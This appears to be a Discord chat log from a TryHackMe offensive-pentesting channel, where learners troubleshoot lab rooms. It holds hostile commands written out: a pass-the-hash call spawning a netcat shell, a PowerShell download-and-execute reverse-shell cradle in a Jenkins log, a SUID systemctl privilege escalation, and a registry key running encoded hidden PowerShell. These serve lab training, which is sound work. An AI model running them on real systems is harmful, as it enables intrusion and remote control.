#offensive-pentesting-path
And I modified that
.
```
# This file was generated by cloudflare-warp.
nameserver 10.200.55.101
nameserver 10.200.55.101
nameserver fd01:db8:1111::2
nameserver fd01:db8:1111::3
search home
options edns0
options trust-ad
```
and nothing
```
nslookup thmdc.za.tryhackme.com
Server: 127.0.2.2
Address: 127.0.2.2#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
```
Hello guys and ladies.
I found something strange in the 'Buffer Overflow Prep' room. The first task, which requires sending an evil buffer, said that I had to find a pattern in the logs, but I'm not sure if the output given as an example is correct.
Is there someone who knows how it should work to complete this task?
I got suspicious that distance is just for example. Thank you @fleet wedge
Gave +1 Rep to @glad kindle
Yep @fleet wedge , seems I need your help one more time.
The manual said that I need to run a server on the Windows machine, run the exploit script and then run the compare command with the ESP register address as the argument, which I'm not sure how to get and it seems it wasn't mentioned earlier.
Brainpan1 is not working. I've done 99% of pentesting, trying to finish it up. Any thoughts on when they will fix it?
Staff are aware.
Hey guys,
I'm playing with the 'kenobi' box. I'm wondering why I need to change my directory to /tmp in the last step? Could anyone help me figure out? TKS!
Why do you think you ‘need’ to? You have control of the things you need to control and you can choose how things happen. Experiment with different ways of making things happen maybe?
Or maybe think about how you’d change the commands if you wanted to not do ‘cd /tmp’, or if you wanted to use a different directory completely.
The specific commands given in the room are imho really just because they had to specify a particular sequence of commands that work, given that the room is a walkthrough. It doesn’t mean that they’re the only commands that will work.
What I learned from the Kenobi room is that you almost always have rights to read and write the tmp folder, but it can be different in the case of other folders.
Btw /dev/shm is a good place to put files too, it will only be saved to memory
/dev/sharedmemory for those wondering what /dev/shm means
Hi guys, I have a problem connecting to Breaching AD network
I had to manually change the interface name from breachad -> tunX at openvpn config file to make it work
I wonder if anyone has the same issue?
welp another one
for some people it works without changing the interface name for some reasons
I see, damn I hate implicit interface names
I decided to change to tun-breachad lol
trying to do a PtH attack on the lateral movement network and when I run `sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:HASH /run:"c:\tools\nc64.exe -e cmd.exe IP PORT"` it doesn't catch on nc
all parameters are correct, I've double checked, so that's not the problem
Hi guys and ladies.
Got the same question as yesterday. 'Buffer Overflow Prep' room, the first task asked to modify the exploit script with bad characters and note the ESP register address after it runs. This is the debugger output from the script run and I'm not sure where this address should be. @fleet wedge maybe you're here today?
I even tried approach from https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
where the payload of the exploit is the random payload from the previous steps plus bad chars, but with the same result.
Sure
Well I did the first task of Buffer Overflow. Memory analysis looks a little bit odd for a developer used to leaving garbage collection to the runtime environment.
Hi guys,
in room : Breaching Active Directory
If anyone has a problem using Burp Suite with NTLM authentication, I'll share a solution
- Setup NTLM auth credentials
- Enable use of HTTP/1.1
Gave +1 Rep to @ebon mesa
Hi Everybody,
in room HackPark of the Offensive Pentesting path I do not understand how to get my meterpreter session to work...
when I launch the script to get the reverse shell I get
[*] Sending stage (175686 bytes) to 10.10.220.146
and then it is stuck there...
so it seems that both the payload and the meterpreter listener are ok... but it only prints that message and it does not go forward... any ideas?
I tried to follow the video, but I am again stuck in the same place
the buffer overflow room is annoying, I did everything correct and I still can't catch a shell
I found out why it didn't work lol
🤦♂️
Am I going mad or was the AD-Basics room changed since I last made my notes?
Was looking to take a copy of the Kerberos auth sequence diagram for my lateral movement section and can't seem to find it (despite my notes highlighting the section after Group Policies)
Ah. Right. There's a separate room outside the path (https://tryhackme.com/room/activedirectorybasics) that covers similar material but splits the auth section to another room for more detail (e.g. what silver/gold tickets refer to)
Path still uses this room https://tryhackme.com/room/winadbasics
Hey, so I have a question for "Hacking with PowerShell" task 2 where it asks us "What is the command to get a new object?". The hint is to combine two verbs. I've tried the obvious answers like Get-Help or Get-Functions, which seem to be the answers, but it doesn't work, so is that bad formatting, or is there some input validation error on the website's end?
The clue is in what you're being asked to do.
Use the list given to you in the task.
well, it tells me to combine two verbs, an example of which is "Get-help join", still doesn't work
What payload did you use? I couldn't get it
I had to print the root.txt content into another file to finish the machine, but it would be good to know how to get the root shell
Thanks!
Gave +1 Rep to @glad kindle
For anyone who is in Steel Mountain:
When it comes to using a PowerShell script, make sure you do `Import-Module [ps1 script name].ps1` to import the script before trying to execute it, after uploading it through meterpreter to the target machine.
For example:
```ps1
Import-Module PowerUp.ps1
```
to import the module, and
```ps1
../PowerUp.ps1
```
to use it.
I felt Privilege Escalation, i.e. Task 3, skipped this part.
or maybe it was part of self research
In the end I managed 😅 I was making a stupid mistake in generating the payload
Hi guys and ladies.
Seems I found a little inaccuracy in the description of the Buffer Overflow Prep room. It says that to generate the cyclic pattern you use the Ruby script from Metasploit located at
`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb`
But I can't find it there; instead, the location that works for me is
`/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb`
Either it's an update of Metasploit on the VM or I missed the script.
Can anyone from the team check it?
just use "msf-pattern_create"
Yes, it's possible to do it that way. By saying 'check it' I mean the description in the room task.
I'm using bettercap in Kali Linux to track the traffic on HTTP and HTTPS websites
it works perfectly on HTTP websites
but when it comes to HTTPS it doesn't, even though I'm using hstshijack
my assumption is that the script called hstshijack.cap in hstshijack is at fault
can anyone help me go any further
anyone
Hi, I have an issue with AttackBox, can someone give me some advice? When I open AttackBox it looks like it doesn't have an internet connection. Because of that I'm unable to continue in the exercises and I've been stuck on that for two days. Does anyone have some advice for me<
*?
Free users don't have an external connection, are you a free user?
Yes I was. Meantime I was too disappointed about that situation and I payed a subscription and that was the problem. But thanks, I appreciate your advice 🙏🏻😁
Guys can someone tell me what is the maximum possible number of vulnerabilities you can find in Relevant box challenge ?
Hello all, I hope everyone is having a wonderful week so far. I was wondering if this is where I go to ask for help with buffer overflow? I have a few questions about finding bad chars. Thanks in advance for any help.
Hi Legends, I am thinking of which pathway I should take since I've done my jr pentester, #offensive-pentesting-path or #1129473280949112842-teaming. Can you please share your reason/thoughts. thx heaps legends😻
Hi, I passed Buffer Overflow Prep room recently and got some idea how it should work
Awesome! My question is about finding them. What's the best method? I've watched and read several walk through all using a different version of Python scripts. Kind of overwhelming.
I have a good grasp on the why and the theory behind it. I just can't seem to get what exact char is "bad". I'll see in the data stream the out-of-place chars, but usually there are 2 or three that are odd in the pattern. Do I use just the one that started the bad set? Or all of them?
What I got is that you use all of them, and don't forget to update the byte array with the new bad chars
It won't let me upload a screenshot, but say it looks like this
```
04030201
08070605
0C0B0A09
100F0E0D
```
Are you sure we're talking about same room?
Hi guys and ladies!
I just started the Brainstorm room and got a quite strange issue here. I tried to scan the machine's open ports with the following different scans:
```
nmap <IP>
nmap -p- <IP>
nmap -sS -p- <IP>
nmap -sT -p- <IP>
nmap -sU -p- <IP>
nmap -sN -p- <IP>
nmap -sF -p- <IP>
nmap -sX -p- <IP>
```
and got at most 3 open ports, but the correct answer for this room is 6 (easy to guess).
Does anyone have any idea how to get 6 open ports here?
Maybe they are being filtered ?
Some scans, for example `nmap -sU -p- <IP>`, gave me that all ports are open|filtered, but others like `nmap -sS -p- <IP>` gave a precise number of ports and it's 3 open ||(actually it's 21,3389,9999)||
Find which ports are missing via a walkthrough, try scanning one and see if it returns open
I'm not sure which are missing 'cause I never saw more than 3 open, but it's supposed to be 6. Maybe the answer in the room is outdated?
I had a similar issue with Kenobi but got more ports than the correct answer. I got around 11, but the correct answer is || 7 ||.
Would anyone have any good reference material for building a pipboy for security testing? I've seen the prebuilds on amazon and considered just reprogramming and upgrading as necessary, but I feel building my own would teach me more. Thank you for your time.
hello
hi there
hi, I have a problem with Active Directory Basics: to connect with the phillip account, I use Remmina, and in the Windows login page I need to type "THM\phillip", but the \ can't be typed with Remmina. So I tried with xfreerdp; here I can type \, but the "(" and the ")" in the first PowerShell command can't be typed 😭 (I use an AZERTY keyboard, for information)
i'm blocked
Have you tried to change the kb layout in your vm?
Or using a virtual keyboard in the vm?
Hi folks, I've been facing issues with the Breaching AD room. I'm using my own machine to connect to the breachAD network. The site then asks me to change my DNS settings using the following command `systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com`, but Kali Linux throws an error `systemd-resolve: command not found`.
I googled about this and someone said that systemd-resolve has been replaced by resolvectl. Can someone please help me with this!!!
Pls DM if you have an answer or at least ping me
How do you choose from the 'Exploit Title' list?
```
Exploit Title | Path
Apport (Ubuntu 14.04/14.10/15.04) - Race Cond | linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privil | linux/local/36782.sh
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - L | linux/local/40937.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_o | linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.0 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.0 | linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / | linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'ov | linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64 | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.0 | windows_x86-64/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/1 | linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Deni | linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs | linux/local/41762.txt
Ubuntu < 15.10 - PT Chown Arbitrary PTs Acces | linux/local/41760.txt
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) | linux/local/36820.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based B | linux/local/44204.md
```
This should be based on your target? Or are you referring to something else perhaps?
You have to replace the $THMDCIP with the IP address of the computer at the top of the schema (it's not really clear, I know)
did anyone have trouble with overflow prep, i feel like it's pretty hard to understand what actually is happening there
Hello, i have a question about the "relevant" room
Always best to just ask your question right away 🙂
ok, I found user credentials so I tried to connect to the machine but it didn't work? I was pretty sure that I was on the right path
is there anyone I can DM to see if I'm on the right path?
In buffer overflow prep, why do the tools not exist anymore? Also how come !mona findmsp -distance 600 doesn’t return an EIP value?
I got it working with offset 2100. I guess the instructions in the room are inconsistent with the actual offsets I’m finding.
Yeah never mind I didn’t read the instructions closely enough
```
└─$ python2 windows-exploit-suggester.py --OPTIONS
[] initiating winsploit version 3.3...
[] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library
└─$ pip install python-xlrd
Defaulting to user installation because normal site-packages is not writeable
ERROR: Could not find a version that satisfies the requirement python-xlrd (from versions: none)
ERROR: No matching distribution found for python-xlrd
```
How can I solve this issue?
Have you checked the error message in Google?
hi, please is there a way one can track a mobile phone with the IMEI or even possible without it
Yes. Not much help. The script is for python 2. I ended up using winpeas.
guys I'm having a problem in the Retro CTF
hello
Hey!
I have a discrepancy on the Buffer Overflow Prep room. According to the walkthrough, I'm supposed to get Corruption after 6 bytes but I get a corruption after 0 bytes. I used the same mona command and same bad bytes.
oh nevermind, you have to keep something in the return address (like "BBBB")
On Brainstorm I see 3 open ports using nmap. Where do the other ports come from?
Has someone done the Alfred room? I can't get the initial access
hey guys. I'm on the Relevant box. I've seen a couple of writeups, including the mayors that show a few more open ports than what I've gotten last night and tonight scanning the machine.
ok I guess I've forgotten how to upload screenshots
Anyone else having issues with the DailyBugle room? It's extremely slow and just hangs indefinitely sometimes
You need to verify your account to do so.
!docs verify
Same, i'm only getting 3 ports. I tried UDP also but it didn't find anything. All the walkthroughs show 3 ports as well but don't give any explanation as to why the answer is 6 LOL
oh yeah that is a bug
¯\_(ツ)_/¯
I got the same thing.
I cannot figure out !verify, idk what I'm doing wrong. I don't see what it's talking about on the users list on the right hand side of the page.
on discord on desktop
hit the button that looks like 2 people
then you will get a list of all the users on this discord
from there left click the @frank trout bot and there should be a box to enter text into
yeah and then i've entered !verify, ! verify, !docs verify. I get nothing
I'm 41 % through the offensive pentesting path and can't figure out how to verify on discord! 🤦♂️
I got it. thanks
haha nice you are verified now
just mark the first byte of those series of bytes as a bad byte
then try again
generally a bad byte can corrupt bytes that come after it
I do. On overflows 4, 5, 6. I finished 1-3 without any problem. Now 4, 5, 6, on 6 right now. First run I get 3 bad chars, un-sequenced; next run I get a bad char that's 2 higher than the previous, ok add it and run again. Get the next number in sequence. I don't add it. Run it again, get the next number in sequence. I don't add it. Get the next number in sequence, and so on it goes. idk. Like I said, I've got the first 3 no prob. idk
following in mem dump, it looks like it says though. like from that null byte on its out of order.
Do I need to update mona in the thm machine?
Hello there, just started the Enumerating AD room .... connected to openvpn through my Kali machine
But when I went to the distributed.za..... site to get the credentials.... it shows the server is down
Anyone can help me with this
Did you add to the resolv.conf file?
Ummm I didn't ....
Just downloaded the ad-enumeration.conf file and did sudo openvpn Aden.......
You need the IP of the THMDC and enter it at the top of the file as
sudo nano /etc/resolv.conf
nameserver 10.200.xxx.101
On it
Thankuuu, its working for mee
Hello sorry for bothering you guys, I am just wondering if anyone in here is familiar with the Networkminer? I am just working on my lab of my college... I am kinda stuck and need some helps, I really appreciate with any responses from u guys....
Hi guys, I am trying to complete the task in Exploiting Active Directory Task 3, but I'm getting an error. I already followed every step one by one but still get the same error. I want to share the screenshot but can't paste the pic in here
You need to verify your account to do so.
!docs verify
Thanks!
Gave +1 Rep to @lofty sky
hi guys, I am trying the Alfred room, but I got some problem when I'm trying to upgrade the nc revshell to meterpreter. I got everything set up, but when I execute `powershell start-process "revshell.exe"` there is no response. The nc PowerShell revshell didn't show a new prompt, no response from meterpreter as well. Here are some screenshots
here is the setting command
Hi, I'm in AD-enumeration room, using 4.1.0 Bloodhound version, my zip file has been correctly uploaded but I still can't find any attack path from my generated AD user, any fix regarding that situation ?
I think I got it, you have to use the task file, or you will not get any result, you don't need exploiting anything in that room
Based on the information you have given, the name of your shell is revshell.exe so you should be calling Start-Process "revshell.exe" (you don't need powershell, you're already in one, also Start-Process is case sensitive)
Thank you for the solution, had the same problem!
Gave +1 Rep to @gloomy escarp
Hi
Hi, I cannot find the squid service running or installed in VirtualBox. But the question asks for the squid proxy version??
```
Nmap done: 1 IP address (1 host up) scanned in 76.51 seconds
root@ip-10-10-123-212:~# nmap -sV 10.10.123.212 | grep squid
root@ip-10-10-123-212:~# systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# sudo systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# netstat -tuln | grep 3128
root@ip-10-10-123-212:~# sudo systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~# systemctl status squid
Unit squid.service could not be found.
root@ip-10-10-123-212:~#
```
Anyone please advise
You are scanning your own IP, that doesn't seem right. What room and task is this?
oh yaa.. i am doing nmap https://tryhackme.com/room/vulnversity# Recon
Did you start the machine with the green "Start Machine" button and allow the VM to boot then use the provided IP in your scan?
Gave +1 Rep to @next wren
np
hi mates, I am new in the cyber world, does anyone have video content for beginner pentesting
YouTube has plenty. How are you doing with this learning path?
I am at breaching AD, where I can ping the DC but not able to do nslookup
Can you check the pins in #breaching-ad
I have seen
if I do this:
nslookup thmdc.za.tryhackme.com
It shows the IP, but when I do this
nslookup tryhackme.com 10.200.28.101
I receive time outs
and on the printer site it shows LDAP server unavailable
but the ntlmauth site works fine
Did you add the THMDC to /etc/resolv.conf?
i added this
nameserver <THMDC-IP>
And can we move this to #breaching-ad
Can you do ip a for me please.
yes
I am able to visit sites but at printer one it tells ldap server is down
like unavailable
Maybe you need to reset the network
You can vote once an hour.
you can vote once an hour too
LDAP is running now?
Ah, good.
From your side, possible.
yea thanks
Site is still showing LDAP unavailable but I got the response on netcat
I think it was working from the start just showing unavailable
someone help me with this: `"IOI_updater" REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$sGMomKEmx=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Temp).Temp);powershell -Win Hidden -enc $sGMomKEmx"`
Hello I have the following doubt can someone please clear it:
How can I log in to a domain if the user does not have permission to write to shares? I tried using psexec but it shows I do not have perms
In enumerating AD they have shown a runas binary in Windows, but how to do this in Linux?
remmina and using rdp
hmmm dunno
could be that it is not wanting to have the domain specification in the username
What should I do
remove the domain in username?
First time I logged in I performed the task, changed the password of the Tier2 admin, and after that I am not able to log in to any account with the correct pass 😢
yeah shadow would try that.... another option would be to try and use Remmina for your RDP client, as that tends to be easier to use than xfreerdp
okay Let me try it
Nope, didn't work
I think resetting network is the last option
For vulnversity "compromise the webserver" I couldn't get the php reverse shell to open a connection to my Kali VM which has an internet connection/vpn to THM because I used it for several modules and rooms, and I'm using my THM VPN IP in the reverse-shell script I got by going to 10.10.10.10 on my Kali browser while my VPN is active.
I know I'm doing it right because it worked instantly when I did it from the attack box. Is there something on my network I should look for that's blocking it? Nothing showed up in my router logs. Or could it be a VM issue that even though my VM can connect out it's blocking a connection into it?
Also, what's the best way to use Kali and the VPN to connect to machines? It gets tedious using a VM because I can't copy stuff out of it into the THM browser for flags and such.
If you use virtualbox, you need to install guest additions to copy/paste.
I'm using Hyper-V. I created an external switch so it can reach out to the internet, which it can. I have this on my list of things to figure out, but I finished the room so I'll mess with it another time. I'm considering just booting Kali from a USB on an older laptop I have and using that to connect to THM
I'll just update that the problem was user error. It had to have been that I wasn't using the VPN (tun0) IP in either the payload or when listening for the incoming connection, and was using the private IP of my VM instead.
Hi guys
hi, I'm trying to work through Alfred and was planning on using RogueWinRM to do the impersonation. I went to https://github.com/antonioCoco/RogueWinRM to grab RogueWinRM, but I have no idea what to do with these files? How do I turn them into the RogueWinRM.exe?
I tried using GCC but the compiler just throws errors
Go the releases page and download the .zip file, it will have the exe within it https://github.com/antonioCoco/RogueWinRM/releases
ty
do you know if there is a way to get an x86 version? Apparently the system does not support the x64 version even though it says it is an x64 system
Room: Persisting Active Directory
In the task "Persistence through GPOs" I cannot add a new GPO. I get the error "Network access denied" when I try to do it. I also waited for a reset of the whole network and tried again, but still no success.
(I run mmc with admin prompt after using "runas /netonly /user:thmchilddc.tryhackme.loc\Administrator cmd.exe")
I might need a bit of help. In the Advanced Exploitation module, Steel Mountain, Task 2, "Take a look at the other web server. What file server is running?" I tried for an hour, but I cannot seem to get to the correct answer. Anyone available to help out/give a hint?
nmap?
Or.. visit?
Of course I ran nmap 🙂
And did you visit the web server?
Nothing corresponds with the number of letters (***..)
Still don't see it. Also not on the page at port 8080
I feel stupid and am banging my head against the wall. 😕
You got an ip?
Yeah
Can I have it?
Ill share in a DM ok?
No, you can post it in here.
Ok. Sorry for the DM. 10.10.36.3
I tried "||Windows 2008 NTFS Server||" as last.
I'm scanning your ip.
the instance.
I wouldn't risk my Community Mentor status like that.
I was just kidding.
The answer is linked in here 😉
Of course I looked there and on the rejetto page. But I cannot find a 7-letter word anywhere.
You're so close...
||rejetto is PART of the answer.||
It's along the same lines as ||python http file server|| 😉
Nooooooo. Pffff hahaha. Thx for the hint. I really felt stupid, whilst I am a long member.
Gave +1 Rep to @finite pivot
Thanks @finite pivot . I finally can move on. I could already maybe, but I like to do things chronologically.
Yeah, I can understand that.
Room: HackPark, I had other ppl follow along with me and their connection came through with clear text mine is only giving gibberish, what am I doing wrong here?
What exact payload did you use? And why is it showing that the connection came from your own machine?
I worked on HackPark, but I'm still in the privesc portion. Did not encounter that though. Can you share a screen capture of the file you uploaded in the vulnerable application and what filename did you save it as?
Also, did this just happen on HackPark only and not on other boxes?
hi it was resolved, the issue was my VM had not had a vpn refresh since the prior night
hi, I have a new problem I am having trouble with. I am on Vulnversity and in the final section of privesc it refers to GTFOBins. I am stuck there, as I believe there are parts of the exploit that I do not need to put into the shell I have on the machine. I do not understand what it means by TF. I may just be out of it as it is very late, but I still wanted to ask:
To my understanding TF is only a variable. Let's wait for others to chime in as to how they understood it.
Ill look to see if I am any help, one sec
Please link the gtfobins you are using so I can read more
but it looks to just be a var
First Command: `sudo install -m =xs $(which systemctl) .`
```sh
sudo install -m =xs $(which systemctl) .
```
- `-m =xs`: This sets the mode (permissions) of the file being installed. `=xs` is not standard syntax for the `chmod` or `install` commands. Normally, `x` would set the execute bit, and `s` would set the setuid bit. However, the `=` operator is used incorrectly. The correct syntax should be something like `-m a=xs` or `-m 4755`.
- `$(which systemctl)`: This is a command substitution that runs `which systemctl` and replaces the `$(which systemctl)` part of the command with the full path to the `systemctl` executable.
- `.`: This is the destination of the `install` command, referring to the current directory.
Second Command: Creating a Temporary Service File
```sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
```
- `TF=$(mktemp).service`: This command creates a temporary file with the `.service` suffix and stores the file path in the variable `TF`.
- `echo ... > $TF`: This echoes a new service file configuration into the `$TF` file. This configuration includes:
  - `[Service]`: The start of the service section.
  - `Type=oneshot`: Specifies that the service is run only once and is not persistent.
  - `ExecStart=/bin/sh -c "id > /tmp/output"`: The command that the service will run once started. It will execute `id` (a command that prints user and group information) and redirect the output to a file named `/tmp/output`.
  - `[Install]`: Begins the section that describes how the service should be installed.
  - `WantedBy=multi-user.target`: This line specifies that the service should be started when the system reaches the `multi-user` runlevel (a state where multiple users can access the system and network services are up).
Third and Fourth Commands: Linking and Enabling the Service
```sh
./systemctl link $TF
./systemctl enable --now $TF
```
- `./systemctl link $TF`: This command is meant to create a symlink for the service file in the system's systemd directory, telling systemd where to find the service file. However, it is normally `systemctl` without `./`, unless the intent is to use a modified or local copy, which could be inferred from the previous misuse of `install`.
- `./systemctl enable --now $TF`: This command tells `systemctl` to enable the service, which makes it start at boot, and `--now` tells it to start the service immediately.
I used ChatGPT to break it down, I would add ChatGPT to your tool kit
ChatGPT told me something similar, but there are still parts I didn't understand. Thank you for taking the time to answer this question for me
Have to make sure to instruct chat to do exactly what you want.
Hi, folks
Are any of the boxes in this mod down or is anyone else having issues accessing any of them?
I'm specifically having trouble with SkyNet and GameZone. I also tested HackPark but didn't have an issue with that
seems I can't connect to DailyBugle either. Just HackPark via browser
hi about active directory basics
I am getting an error trying to run the command to change sophie's pass as phillip, like phillip does not have sufficient privs
am i missing sth?
I am getting error "access is Denied"
what command are you running?
What have you tried to connect to the target VMs attached to those rooms?
I use openvpn as I always have, and I've done these rooms before; I've reset the VPN connection, restarted my network manager, restarted my VM. I can ping them, can't access them on the browser though; except HackPark, that's browser accessible out of the 4 I've tested
I haven't worked on Daily Bugle and GameZone yet, but I'll try to connect to those when I get a chance.
Before I put too much more effort into it I wanted to make sure that the boxes were actually up, so I came here. I can ping them so I guess they are. but I can't get them through the browser for anything I do, I've reset everything and tried multiple times
yea, thanks. Just knowing if anyone else is having the problem or not would be good
Gave +1 Rep to @lofty sky
hi! i am trying to run the command as given in the example : Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
nvm i had to delegate control first...
Thanks a lot!
Gave +1 Rep to @keen iris
is anyone facing this problem with Alfred room where Invoke-PowerShellTcp.ps1 is to be run to gain remote shell.
I am facing this problem
```
Started by user admin
Running as SYSTEM
Building in workspace C:\Program Files (x86)\Jenkins\workspace\project
[project] $ cmd /c call C:\Users\bruce\AppData\Local\Temp\jenkins1263082392557087775.bat
C:\Program Files (x86)\Jenkins\workspace\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.247.221:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.247.221 -Port 4444
Invoke-Expression : Unexpected token ':' in expression or statement.
At line:1 char:4
+ iex <<<< (New-Object Net.WebClient).DownloadString('http://10.10.247.221:800
0/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.247
.221 -Port 4444
+ CategoryInfo : ParserError: (::String) [Invoke-Expression], Par
seException
+ FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In
vokeExpressionCommand
The term 'Invoke-PowerShellTcp' is not recognized as the name of a cmdlet, func
tion, script file, or operable program. Check the spelling of the name, or if a
path was included, verify that the path is correct and try again.
At line:1 char:121
+ iex (New-Object Net.WebClient).DownloadString('http://10.10.247.221:8000/Invo
ke-PowerShellTcp.ps1');Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.247
.221 -Port 4444
+ CategoryInfo : ObjectNotFound: (Invoke-PowerShellTcp:String) []
, CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
C:\Program Files (x86)\Jenkins\workspace\project>exit 1
Build step 'Execute Windows batch command' marked build as failure
Finished: FAILURE
```
I am using this in the Windows batch command option in the configure tab of the project. Could someone help me? I've tried restarting the machine but it still doesn't work.
From what I can understand it doesn't find the ps1 file on your local webserver. Make sure the file is located in the folder where you started your webserver. Say, if you started the web server in /tmp/, the ps1 file should be there.
can someone please tell me if there is a ready-to-use windows machine to work on Task #2 from https://tryhackme.com/room/adenumeration ?
There isn't, you need to use the attackbox or VM and RDP in, if you need to.
how will RDP help if I have no windows machine to connect to?
@finite pivot can you please explain to me how I can connect to one of those machines step by step? I have the credentials to connect via ssh
The room shows you to? I think
I guess no, that's exactly my problem
Q for red teamers : would u prefer using openvpn as a tunnel between your local c2 and a redirector (hosting on cloud) or using nebula 😉
Does anyone have an example of using Incognito to abuse SeImpersonatePrivilege that does NOT involve using Metasploit? I can't seem to find anything - every time there is mention of Incognito it is done through Meterpreter
Use potato family instead
hi guys, i need help
Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.
this error is given when trying to save the reverse shell in the php file in the WordPress panel
Can someone help me?
Are you already an admin equivalent user in wordpress? Also, what room or box are you working on?
yes, I logged in as admin.
I'm at Offensive Pentesting > Advanced Exploitation > Internal
Oh.. Internal.. haven't done this box yet. Have you tried to do it in other pages?
Yes, I tried, but it did the same thing.
I'm trying again
If there is anyone who has already done this room and can help me... I would appreciate it!
but thanks for trying to help me!
Gave +1 Rep to @lofty sky
I'll try to take a stab at it tomorrow (after the AoC task) as I'm already curious.
ok, if you can tell me!
I managed it, but only on the AttackBox; on my Kali Linux with the VPN it was not possible.
I'm stuck at the Game Zone room
I'm unable to do reverse SSH tunneling in task 5
I'm using the command as specified
but it is not working for me
Can anyone help
Which part were you stuck at? I'm working on internal and am stuck after getting the SSH tunnel set up and accessing the Jenkins page. When I try to connect to localhost it says connection refused
As in I can't access the 127.0.0.1:8080 because it says connection refused
Hi, I am now at this path. I'm preparing for the CompTIA Pentest+ certificate and I want some recommendations: do I need to finish this path first or jump to the CompTIA path?
I would say just jump into the Pentest+ path
Then return to Offensive path ?
Offensive path is more difficult than the Pentest+ one imo and the knowledge in it would be overkill for the exam. It is good learning to do after the fact, but I wouldn't feel like you need to go through it before getting the certification.
Can you please show me the roadmap of all TryHackMe paths?
👍
@pearl bronze
got
hi
this is the command mentioned in task 1: xfreerdp /u:admin /p:password /cert:ignore /v:<ip> /workarea
but the connection is getting an error
did you put the IP in?
yes
are you connected to the vpn?
yes
what OS are you on
kali linux
`┌──(kali㉿kali)-[~]
└─$ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.57.12 /workarea
[10:10:58:996] [81332:81333] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:10:58:999] [81332:81333] [ERROR][com.freerdp.core] - failed to connect to 10.10.57.12`
what does ip a say?
are you actually connected to the vpn?
if so
try another server
or regenerating your vpn file
I'm unable to get the SSH tunnel working even after following the instructions. I'm unable to access localhost:10000 on my system
in my terminal I'm getting the error: channel 3: open failed: administratively prohibited: open failed
I saw many videos and consulted write-ups; nowhere is this problem encountered after following the instructions
I worked out that I made a mistake with the IP address when trying to connect. The command is ssh -L 1234:[IP from the .txt file]:8080 aubreanna@[IP of the original target machine]
I can't remember the IP from the text file off the top of my head so lets pretend its 174.56.0.2 (this is the site that can only be accessed "internally"). So the tunnel command is: ssh -L 1234:174.56.0.2:8080 aubreanna@10.10.64.92 with 10.10.64.92 being the IP of the original target machine (the one THM gives you when you start it up)
In the Breaching AD room in Task 3 (NTLM Authenticated Services) we are given the python script to attack the authentication page. For the sake of the learning experience I was trying to also use Hydra against it but can't figure out how to do it? Anyone able to help?
Hey,
I'm kinda stuck in this room, I know how I can manage to do it, but I need some help to explain what is wrong with my steps in Steel Mountain room.
Can someone help me pls ?
In what specific step are you currently stuck?
The part without Metasploit
I passed it because I know the command but the python2 code wasn't working
And the Part with metasploit, the weak permission vulnerability gave me a hard time LOL. I had to use the exact sc command with specific arguments
Aahh. It is quite challenging especially if you haven't done much Windows boxes. I had to use a write up for it as a guide.
Hello everyone
In the room named "Blue"
on the second task "Gain access", I tried to run the EternalBlue script, however it's not working as expected.
I have attached the log data.
Kindly help.
You are using a wrong LHOST.
It has to be set to your tun0 IP
Thanks.
I will try again.
I'm still getting the attached error.
I have changed the LHOST to my tun0 IP
` Name Current Setting Required Description
RHOSTS 10.10.39.96 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
